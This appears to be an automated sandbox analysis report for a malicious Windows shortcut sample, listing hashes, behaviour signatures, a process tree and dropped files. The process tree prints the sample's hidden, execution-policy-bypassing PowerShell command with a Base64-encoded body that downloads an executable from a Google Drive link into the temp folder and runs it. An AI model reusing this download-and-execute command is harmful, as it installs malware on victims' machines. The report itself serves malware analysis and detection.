Analysis
- max time kernel: 139s
- max time network: 160s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 11-05-2024 11:54
Static task: static1
Behavioral task: behavioral1
- Sample: 34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
- Resource: win7-20231129-en
Behavioral task: behavioral2
- Sample: 34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
- Resource: win10v2004-20240226-en
General
- Target: 34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
- Size: 3KB
- MD5: 34759a7b254af5d435a747330e172602
- SHA1: d0d2d2abc845103bc0655fd6fcc74adc332d34f5
- SHA256: f79b3fb8b11748b9b8a68c316c805366e05f34b9c2bf41814191d03df53522ed
- SHA512: 4662b3e3f21ef000f569acb096f697e074b4425df67c3d3b34611cc65873cd02f17cf80edf5ba2a3b3287bd16e268d262f2f7706de5c275afbffc587e7b5bd72
Malware Config
- Extracted: https://drive.google.com/uc?export=download&id=1SCyn_ZPahvp66p8IWBybgyebqvi_tKj8
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow 7: pid 2468 powershell.exe
    flow 10: pid 2468 powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run Powershell and hide display window.
  Processes:
    pid 4700 powershell.exe
    pid 2468 powershell.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    Key value queried: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (cmd.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid 4700 powershell.exe
    pid 4700 powershell.exe
    pid 2468 powershell.exe
    pid 2468 powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    Token: SeDebugPrivilege, pid 4700 powershell.exe
    Token: SeDebugPrivilege, pid 2468 powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
    PID 3040 (cmd.exe) wrote to memory of 4700 (powershell.exe)
    PID 3040 (cmd.exe) wrote to memory of 4700 (powershell.exe)
    PID 4700 (powershell.exe) wrote to memory of 3504 (cmd.exe)
    PID 4700 (powershell.exe) wrote to memory of 3504 (cmd.exe)
    PID 3504 (cmd.exe) wrote to memory of 2468 (powershell.exe)
    PID 3504 (cmd.exe) wrote to memory of 2468 (powershell.exe)
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd /c pOWersHELL.exe -Ex bypasS -W hiddeN -Ec CQAMAAkAKAAJACAACQBOAEUAdwAtAG8AQgBqAGUAQwB0AAkACwAgAHMAeQBTAFQARQBtAC4ATgBlAHQALgB3AGUAQgBDAEwAaQBFAG4AVAAJAAkAIAApAC4ARABvAFcATgBMAE8AYQBEAEYASQBMAEUAKAAgAAkAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAFMAQwB5AG4AXwBaAFAAYQBoAHYAcAA2ADYAcAA4AEkAVwBCAHkAYgBnAHkAZQBiAHEAdgBpAF8AdABLAGoAOAAdIAkACwAgACwAIAALACAAHSAkAEUAbgB2ADoAVABlAG0AcABcAHAAZABmAHIAcgB0AC4AZQB4AGUAHSAgAAkAIAApAAkACQAJADsAIAAJAAkASQBuAFYAbwBLAGUALQBJAFQAZQBNACAAIAAgAB0gJABFAE4AVgA6AHQARQBtAHAAXABwAGQAZgByAHIAdAAuAGUAeABlAB0g
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c pOWersHELL.exe -Ex bypasS -W hiddeN -Ec …
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: pOWersHELL.exe -Ex bypasS -W hiddeN -Ec CQAMAAkAKAAJACAACQBOAEUAdwAtAG8AQgBqAGUAQwB0AAkACwAgAHMAeQBTAFQARQBtAC4ATgBlAHQALgB3AGUAQgBDAEwAaQBFAG4AVAAJAAkAIAApAC4ARABvAFcATgBMAE8AYQBEAEYASQBMAEUAKAAgAAkAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAFMAQwB5AG4AXwBaAFAAYQBoAHYAcAA2ADYAcAA4AEkAVwBCAHkAYgBnAHkAZQBiAHEAdgBpAF8AdABLAGoAOAAdIAkACwAgACwAIAALACAAHSAkAEUAbgB2ADoAVABlAG0AcABcAHAAZABmAHIAcgB0AC4AZQB4AGUAHSAgAAkAIAApAAkACQAJADsAIAAJAAkASQBuAFYAbwBLAGUALQBJAFQAZQBNACAAIAAgAB0gJABFAE4AVgA6AHQARQBtAHAAXABwAGQAZgByAHIAdAAuAGUAeABlAB0g
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3716 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
  MD5: 23909774a4f0358be8e03226d73fbd61
  SHA1: 4df262994ce4eb3935965881c1e2dc730668da94
  SHA256: 6dbd177f5aa34f836bf52885c04a3a93771384ebad954911be812c039290bcad
  SHA512: 6ed0bfd0a498043cccf9ef2d9bebc869c4f5f2befc90636e2e3167b2d0b694c538f93aaeefe221bc08ca3962c6499f402df4934444c9f82883d3314075d5f05b
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_khhcljel.s12.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- memory/4700-2-0x00007FFD84573000-0x00007FFD84575000-memory.dmp
  Filesize: 8KB
- memory/4700-12-0x0000014571520000-0x0000014571542000-memory.dmp
  Filesize: 136KB
- memory/4700-13-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
  Filesize: 10.8MB
- memory/4700-14-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
  Filesize: 10.8MB
- memory/4700-15-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
  Filesize: 10.8MB
- memory/4700-30-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
  Filesize: 10.8MB